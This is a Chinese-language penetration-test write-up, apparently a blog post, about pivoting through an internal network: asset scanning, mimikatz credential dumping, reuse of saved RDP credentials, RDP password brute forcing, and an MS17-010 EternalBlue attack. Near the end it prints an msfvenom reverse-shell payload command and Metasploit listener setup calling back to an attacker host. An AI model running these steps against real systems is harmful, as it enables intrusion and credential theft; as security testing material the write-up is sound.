在上次拿下了一台内网主机后，将其作为跳板，对192.168/16网段进行了扫描

介绍

先上一张内网环境拓扑图

1568903322779

经过扫描后，识别出几个重要资产，并将他们作为目标进行针对性的测试

192.168.122.8
192.168.122.11
192.168.122.12
192.168.122.13
192.168.122.15
192.168.122.16
192.168.122.54
192.168.122.60

1568901397651

通过banner和80端口title

识别到的资产如下

192.168.101.3->锐捷交换机

1568901498643

192.168.135.1->锐捷AC控制器，下联5个AP

1568901527565

192.168.122.8->VMware vCenter主机

1568901579163

192.168.122.6-> ESXi主机

1568903430349

内网大杀器MS17-010的扫描结果

1568901642587

攻击路径：10.46.1.16=192.168.122.16->192.168.122.11->192.168.122.15->192.168.122.54->192.168.122.60->192.168.122.8->192.168.122.6

攻击路径

10.46.1.16

MSSQL弱口令+IIS7web服务无webshell，见上一篇博客

192.168.122.16->192.168.122.11

使用自行创建的管理员权限的asp.net账户登录后，运行mimikatz抓到了administrator用户的密码

1568903727776

然后使用administrator用户登录192.168.122.16，发现在mstsc中有192.168.122.11的历史连接记录并且保存了帐号密码，连接上后发现是administrator用户，再次抓取192.168.122.11密码，发现密码与.16的一样，并且在桌面发现了数据库连接密码，保存备用

192.168.122.11->192.168.122.15

由于内网中已有2台主机密码一样，将密码做成字典后对192.168.122.0/24进行了RDP爆破，发现192.168.122.15的密码也为Dell123456，逐拿下第三台

192.168.122.15->192.168.122.54->192.168.122.60

由于192.168.122.60这台主机存在ms17-010漏洞，MSF的代理隧道不稳定，决定利用BPF中的Eternalblue模块进行攻击，对相关文件进行代理设置后

1568904161142

由kali机生成meterpreter木马并设置监听

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.16.11.85 LPORT=4444 -f dll >~/backdoor_x64.dll

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 10.16.11.85
lhost => 10.16.11.85
msf5 exploit(multi/handler) > run

设置好BPF后，对192.168.122.54进行了攻击并获得了一个system权限的shell

1568904281983